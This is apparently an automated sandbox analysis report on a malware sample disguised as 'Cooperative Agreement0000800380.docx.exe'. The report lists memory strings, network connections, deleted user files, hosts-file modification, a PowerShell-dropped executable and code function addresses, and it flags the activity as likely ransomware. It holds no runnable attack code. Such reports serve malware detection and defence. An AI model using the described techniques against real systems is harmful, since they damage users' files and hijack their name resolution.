Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: chost.exe, 00000011.00000003.2198748954.0000016E177B2000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2210509318.0000016E1774E000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E177B2000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E1774E000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2213105581.0000016E177B2000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E18984000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376637980.0000016E18448000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2201304852.0000016E1774E000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2207707806.0000016E177B2000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2213135289.0000016E1774E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: chost.exe, 00000011.00000003.2370358863.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2372629701.0000016E1731D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2176244203.0000016E177B6000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2202547693.0000016E1772C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: chost.exe, 00000011.00000003.2198748954.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E17761000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: chost.exe, 00000011.00000003.2176244203.0000016E177B6000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2176244203.0000016E1772C000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2202547693.0000016E1772C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: chost.exe, 00000011.00000003.2198748954.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E17761000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: chost.exe, 00000011.00000003.2176244203.0000016E177B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: chost.exe, 00000011.00000003.2198748954.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E17761000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: chost.exe, 00000011.00000003.2198748954.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2176244203.0000016E177B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: chost.exe, 00000011.00000003.2370070368.0000016E17586000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2247819963.0000016E17585000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373846136.0000016E17900000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2176244203.0000016E1774F000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373248659.0000016E17589000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E17583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: chost.exe, 00000011.00000003.2198748954.0000016E17761000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2216947461.0000016E17761000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: chost.exe, 00000011.00000002.2376962492.0000016E189EC000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2374587736.0000016E17C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: chost.exe, 00000011.00000002.2376962492.0000016E18984000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: chost.exe, 00000010.00000003.2022156527.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmp, chost.exe, 00000011.00000002.2382640671.00007FFDF701A000.00000004.00000001.01000000.0000001A.sdmp, libssl-3.dll.16.dr	String found in binary or memory: https://www.openssl.org/H
Source: chost.exe, 00000011.00000002.2383172319.00007FFDF7956000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://www.python.org/psf/license/
Source: chost.exe, 00000011.00000002.2383172319.00007FFDF7852000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://www.python.org/psf/license/)
Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: chost.exe, 00000011.00000003.2370070368.0000016E17586000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2247819963.0000016E17585000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373248659.0000016E17589000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2053657547.0000016E1758D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E17583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: chost.exe, 00000011.00000002.2376400796.0000016E1833C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: chost.exe, 00000011.00000002.2376962492.0000016E18940000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: chost.exe, 00000011.00000002.2376962492.0000016E18984000.00000004.00001000.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2376962492.0000016E189A4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: chost.exe, 00000011.00000003.2053657547.0000016E176DD000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2370070368.0000016E17586000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373846136.0000016E178B0000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2247819963.0000016E17585000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2373248659.0000016E17589000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2053657547.0000016E1758D000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000003.2245289338.0000016E17583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443

Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49733 version: TLS 1.2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\Temp\chost.exe	File deleted: C:\Users\user\AppData\Local\Temp\? ? \Common Files\Desktop\YPSIACHYXW.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File deleted: C:\Users\user\AppData\Local\Temp\? ? \Common Files\Desktop\VLZDGUKUTZ.docx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File deleted: C:\Users\user\AppData\Local\Temp\? ? \Common Files\Desktop\DVWHKMNFNN.pdf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File deleted: C:\Users\user\AppData\Local\Temp\? ? \Common Files\Desktop\DVWHKMNFNN.mp3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	File deleted: C:\Users\user\AppData\Local\Temp\? ? \Common Files\Desktop\JSDNGYCOWY.mp3	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\chost.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: cmd.exe

Process created: 66

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\chost.exe

Jump to dropped file

Writes or reads registry keys via WMI

Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Code function: 0_2_0040C898	0_2_0040C898
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Code function: 0_2_0040E950	0_2_0040E950
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Code function: 0_2_00410910	0_2_00410910
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Code function: 0_2_004109D9	0_2_004109D9
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Code function: 0_2_004105E0	0_2_004105E0
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Code function: 0_2_00411580	0_2_00411580
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Code function: 0_2_00410993	0_2_00410993
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Code function: 0_2_00410600	0_2_00410600
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Code function: 0_2_0040B347	0_2_0040B347
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Code function: 0_2_0040F3C8	0_2_0040F3C8
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694361000	16_2_00007FF694361000
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694380938	16_2_00007FF694380938
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF6943869D4	16_2_00007FF6943869D4
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694368BD0	16_2_00007FF694368BD0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694375DA0	16_2_00007FF694375DA0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694373610	16_2_00007FF694373610
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694371DC4	16_2_00007FF694371DC4
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF69437E5E0	16_2_00007FF69437E5E0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694379F10	16_2_00007FF694379F10
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694385EEC	16_2_00007FF694385EEC
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694389798	16_2_00007FF694389798
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF6943717B0	16_2_00007FF6943717B0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF69437DF60	16_2_00007FF69437DF60
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694378804	16_2_00007FF694378804
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694371FD0	16_2_00007FF694371FD0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694369870	16_2_00007FF694369870
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF69438411C	16_2_00007FF69438411C
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF6943818E4	16_2_00007FF6943818E4
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF6943719B4	16_2_00007FF6943719B4
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694378154	16_2_00007FF694378154
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694373A14	16_2_00007FF694373A14
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF6943721D4	16_2_00007FF6943721D4
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF69437DACC	16_2_00007FF69437DACC
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF69436A34B	16_2_00007FF69436A34B
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694371BC0	16_2_00007FF694371BC0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694372C80	16_2_00007FF694372C80
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694383C80	16_2_00007FF694383C80
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694386488	16_2_00007FF694386488
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694380938	16_2_00007FF694380938
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF694385C70	16_2_00007FF694385C70
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF69436AD1D	16_2_00007FF69436AD1D
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 16_2_00007FF69436A4E4	16_2_00007FF69436A4E4
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694361000	17_2_00007FF694361000
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF6943869D4	17_2_00007FF6943869D4
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694385C70	17_2_00007FF694385C70
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694375DA0	17_2_00007FF694375DA0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694373610	17_2_00007FF694373610
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694371DC4	17_2_00007FF694371DC4
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF69437E5E0	17_2_00007FF69437E5E0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694379F10	17_2_00007FF694379F10
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694385EEC	17_2_00007FF694385EEC
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694389798	17_2_00007FF694389798
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF6943717B0	17_2_00007FF6943717B0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF69437DF60	17_2_00007FF69437DF60
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694378804	17_2_00007FF694378804
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694371FD0	17_2_00007FF694371FD0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694369870	17_2_00007FF694369870
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF69438411C	17_2_00007FF69438411C
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF6943818E4	17_2_00007FF6943818E4
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF6943719B4	17_2_00007FF6943719B4
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694380938	17_2_00007FF694380938
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694378154	17_2_00007FF694378154
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694373A14	17_2_00007FF694373A14
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF6943721D4	17_2_00007FF6943721D4
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF69437DACC	17_2_00007FF69437DACC
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF69436A34B	17_2_00007FF69436A34B
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694371BC0	17_2_00007FF694371BC0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694368BD0	17_2_00007FF694368BD0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694372C80	17_2_00007FF694372C80
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694383C80	17_2_00007FF694383C80
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694386488	17_2_00007FF694386488
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF694380938	17_2_00007FF694380938
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF69436AD1D	17_2_00007FF69436AD1D
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FF69436A4E4	17_2_00007FF69436A4E4
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE412F0	17_2_00007FFDEAE412F0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDEAE41880	17_2_00007FFDEAE41880
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A85C00	17_2_00007FFDF6A85C00
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A41C12	17_2_00007FFDF6A41C12
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6AB3650	17_2_00007FFDF6AB3650
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A417F8	17_2_00007FFDF6A417F8
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6AAD2D0	17_2_00007FFDF6AAD2D0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A42702	17_2_00007FFDF6A42702
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A424DC	17_2_00007FFDF6A424DC
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A41546	17_2_00007FFDF6A41546
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A41AD7	17_2_00007FFDF6A41AD7
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A66030	17_2_00007FFDF6A66030
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A41FDC	17_2_00007FFDF6A41FDC
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A8DE50	17_2_00007FFDF6A8DE50
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A421E4	17_2_00007FFDF6A421E4
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A6BAE0	17_2_00007FFDF6A6BAE0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A89A60	17_2_00007FFDF6A89A60
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A4155A	17_2_00007FFDF6A4155A
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A41654	17_2_00007FFDF6A41654
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A421C6	17_2_00007FFDF6A421C6
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A413DE	17_2_00007FFDF6A413DE
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A41596	17_2_00007FFDF6A41596
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6B07A20	17_2_00007FFDF6B07A20
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A8D980	17_2_00007FFDF6A8D980
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A48720	17_2_00007FFDF6A48720
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A4116D	17_2_00007FFDF6A4116D
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A416FE	17_2_00007FFDF6A416FE
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A41D93	17_2_00007FFDF6A41D93
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A4117C	17_2_00007FFDF6A4117C
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A4149C	17_2_00007FFDF6A4149C
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A41CBC	17_2_00007FFDF6A41CBC
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6ABAC80	17_2_00007FFDF6ABAC80
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A41B54	17_2_00007FFDF6A41B54
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A41A0F	17_2_00007FFDF6A41A0F
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A42617	17_2_00007FFDF6A42617
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A41EE2	17_2_00007FFDF6A41EE2
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A78920	17_2_00007FFDF6A78920
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6AB8870	17_2_00007FFDF6AB8870
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF6A41618	17_2_00007FFDF6A41618
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF7019060	17_2_00007FFDF7019060
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF7069260	17_2_00007FFDF7069260
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF7072210	17_2_00007FFDF7072210
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF70CD030	17_2_00007FFDF70CD030
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF70D4D90	17_2_00007FFDF70D4D90
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF7069CB0	17_2_00007FFDF7069CB0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF70B0790	17_2_00007FFDF70B0790
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF7054800	17_2_00007FFDF7054800
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF705A850	17_2_00007FFDF705A850
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF70AB670	17_2_00007FFDF70AB670
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF70AE740	17_2_00007FFDF70AE740
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF7074560	17_2_00007FFDF7074560
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF70815A0	17_2_00007FFDF70815A0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF707E5A0	17_2_00007FFDF707E5A0
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF7063600	17_2_00007FFDF7063600
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: 17_2_00007FFDF70F5630	17_2_00007FFDF70F5630
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FFD93884070	25_2_00007FFD93884070
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 79_2_00007FFD96381FFD	79_2_00007FFD96381FFD

Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: String function: 00007FFDF705A490 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: String function: 00007FFDF6A41325 appears 518 times
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: String function: 00007FFDF6ABD425 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: String function: 00007FFDF6ABD341 appears 1192 times
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: String function: 00007FF694362710 appears 104 times
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: String function: 00007FFDF6ABD32F appears 324 times
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: String function: 00007FFDF6ABD33B appears 39 times
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: String function: 00007FFDF6ABDB03 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: String function: 00007FF694362910 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Code function: String function: 00007FFDF7059330 appears 40 times

Source: rar.exe.16.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.16.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: api-ms-win-core-file-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
